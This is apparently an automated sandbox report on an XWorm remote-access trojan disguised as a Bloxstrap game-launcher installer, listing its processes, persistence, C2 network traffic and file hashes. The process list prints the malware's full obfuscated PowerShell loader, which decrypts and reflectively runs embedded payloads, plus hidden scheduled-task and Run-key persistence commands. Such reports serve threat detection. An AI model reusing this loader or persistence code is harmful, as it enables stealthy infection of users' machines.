Malware Analysis Report

2024-11-16 13:41

Sample ID 240531-vatddafb38
Target Bloxstrap-v2.5.4.exe
SHA256 669d8928c72692d168e5c283fcff37613d98e31267b81d41931651eeed78bb8b
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

669d8928c72692d168e5c283fcff37613d98e31267b81d41931651eeed78bb8b

Threat Level: Known bad

The file Bloxstrap-v2.5.4.exe was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Xworm

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 16:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 16:47

Reported

2024-05-31 16:50

Platform

win10v2004-20240426-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\ProgramData\Bloxstrap-v2.5.4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\ProgramData\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\ProgramData\XClient.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Bloxstrap-v2.5.4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\Bloxstrap-v2.5.4.exe
PID 1432 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\Bloxstrap-v2.5.4.exe
PID 1432 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\XClient.exe
PID 1432 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\ProgramData\XClient.exe
PID 1432 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\Windows\system32\cmd.exe
PID 1432 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe C:\Windows\system32\cmd.exe
PID 3716 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3716 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2520 wrote to memory of 728 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2520 wrote to memory of 728 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3716 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3716 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4876 wrote to memory of 1436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4876 wrote to memory of 1436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1436 wrote to memory of 4500 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1436 wrote to memory of 4500 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4500 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4500 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1044 wrote to memory of 4800 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1044 wrote to memory of 4800 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4728 wrote to memory of 4052 N/A C:\ProgramData\XClient.exe C:\Windows\System32\schtasks.exe
PID 4728 wrote to memory of 4052 N/A C:\ProgramData\XClient.exe C:\Windows\System32\schtasks.exe
PID 4500 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4500 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe

"C:\Users\Admin\AppData\Local\Temp\Bloxstrap-v2.5.4.exe"

C:\ProgramData\Bloxstrap-v2.5.4.exe

"C:\ProgramData\Bloxstrap-v2.5.4.exe"

C:\ProgramData\XClient.exe

"C:\ProgramData\XClient.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\XClient.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PJS/BcanmwhMWKk5w9O57bBkKeB36Vroa2tTsg6h/tQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xxW68pRc8sY81E0yM+WLKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EIthi=New-Object System.IO.MemoryStream(,$param_var); $DVqsl=New-Object System.IO.MemoryStream; $sHwPF=New-Object System.IO.Compression.GZipStream($EIthi, [IO.Compression.CompressionMode]::Decompress); $sHwPF.CopyTo($DVqsl); $sHwPF.Dispose(); $EIthi.Dispose(); $DVqsl.Dispose(); $DVqsl.ToArray();}function execute_function($param_var,$param2_var){ $UlOJl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pCbaQ=$UlOJl.EntryPoint; $pCbaQ.Invoke($null, $param2_var);}$ZNyHX = 'C:\ProgramData\XClient.bat';$host.UI.RawUI.WindowTitle = $ZNyHX;$CXdWy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZNyHX).Split([Environment]::NewLine);foreach ($schqS in $CXdWy) { if ($schqS.StartsWith(':: ')) { $BGpTM=$schqS.Substring(3); break; }}$payloads_var=[string[]]$BGpTM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_623_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_623.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_623.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_623.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PJS/BcanmwhMWKk5w9O57bBkKeB36Vroa2tTsg6h/tQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xxW68pRc8sY81E0yM+WLKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EIthi=New-Object System.IO.MemoryStream(,$param_var); $DVqsl=New-Object System.IO.MemoryStream; $sHwPF=New-Object System.IO.Compression.GZipStream($EIthi, [IO.Compression.CompressionMode]::Decompress); $sHwPF.CopyTo($DVqsl); $sHwPF.Dispose(); $EIthi.Dispose(); $DVqsl.Dispose(); $DVqsl.ToArray();}function execute_function($param_var,$param2_var){ $UlOJl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pCbaQ=$UlOJl.EntryPoint; $pCbaQ.Invoke($null, $param2_var);}$ZNyHX = 'C:\Users\Admin\AppData\Roaming\startup_str_623.bat';$host.UI.RawUI.WindowTitle = $ZNyHX;$CXdWy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZNyHX).Split([Environment]::NewLine);foreach ($schqS in $CXdWy) { if ($schqS.StartsWith(':: ')) { $BGpTM=$schqS.Substring(3); break; }}$payloads_var=[string[]]$BGpTM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 selected-thongs.gl.at.ply.gg udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp
US 147.185.221.19:80 selected-thongs.gl.at.ply.gg tcp

Files

memory/1432-0-0x00007FFFFD8A3000-0x00007FFFFD8A5000-memory.dmp

memory/1432-1-0x0000000000110000-0x0000000000924000-memory.dmp

C:\ProgramData\Bloxstrap-v2.5.4.exe

MD5 dbb820772caf0003967ef0f269fbdeb1
SHA1 31992bd4977a7dfeba67537a2da6c9ca64bc304c
SHA256 b2ac1e407ed3ecd7c7faa6de929a68fb51145662cf793c40b69eb59295bba6bc
SHA512 e8ac879c7198dffb78bc6ee4ad49b5de40a5a7dbbda53d427d0a034941487d13c8bb2b8d590a1fcdd81cd6abb8f21fdfcd52924eb00c45a42ee06c1e4b3d590f

C:\ProgramData\XClient.exe

MD5 2271dd87f3bf9de4b0cdffe63adbf8f4
SHA1 9ffbaf8862a5c5098bc98a11af024d8de23efa84
SHA256 2de44472db0baa936146b4194c9b5463e7fa8ce7f38d3c020decaf3ef7f1bff0
SHA512 58eaef8c7d63daa1207118fcc1b099f27e97acc5447f84a20eaf8741619cf4dbd149327f5701a0d8501c285dbc4e12ab1f1da1dd877ababd78bda0a5c1762ded

memory/4728-28-0x0000000000E80000-0x0000000000E98000-memory.dmp

memory/3168-30-0x00007FFFF9F5B000-0x00007FFFF9F5C000-memory.dmp

memory/4728-29-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

C:\ProgramData\XClient.bat

MD5 a34475715e45e8367d3cbba514f176de
SHA1 9c20ae085c7a0c65c2565d7160773b5c59441759
SHA256 6df02430ef3b5f9bc01d0e62dbfc425e47323df4fd5a09cae01f3b17825c89d7
SHA512 776a46e92c021cee8e970972f4e37729fdc6aa58c24caa3d9788887599ce3a56a7321d3484ce680d2f900038482d365bc606ec692d56d83a5482f3aab1d21879

memory/4876-38-0x000001ED5E0E0000-0x000001ED5E102000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z2yhjlfs.dr0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4876-42-0x000001ED5E330000-0x000001ED5E338000-memory.dmp

memory/4876-43-0x000001ED5E360000-0x000001ED5E398000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5c0923e8e7765d761022bd427d59e9ca
SHA1 7490e1b19c5662e6339a68ba67920992dbfa3d33
SHA256 299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7
SHA512 a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_623.vbs

MD5 47ac0afd532e94d7393cad30f2ee1162
SHA1 d04a845ee060407d3f2d4f46003806cc54dd76de
SHA256 5ea2708c84c04ff9fdadd656fa736480014347ec599556f0583f598c31fc604b
SHA512 378b2d45393bbf413e39b2a68c9ea51b1a84d22d54951a9c69f0d4ec77fa2228f80d8db3e9713b97b02912a107235cf1109b233a9b71517a9443e670bb3a7b37

memory/4728-65-0x000000001BAD0000-0x000000001BAE0000-memory.dmp

memory/3388-76-0x000001C56C990000-0x000001C56C9A8000-memory.dmp

memory/4728-81-0x00007FFFFD8A0000-0x00007FFFFE361000-memory.dmp

memory/3168-82-0x00007FFFF9F5B000-0x00007FFFF9F5C000-memory.dmp

memory/4728-83-0x000000001BAD0000-0x000000001BAE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1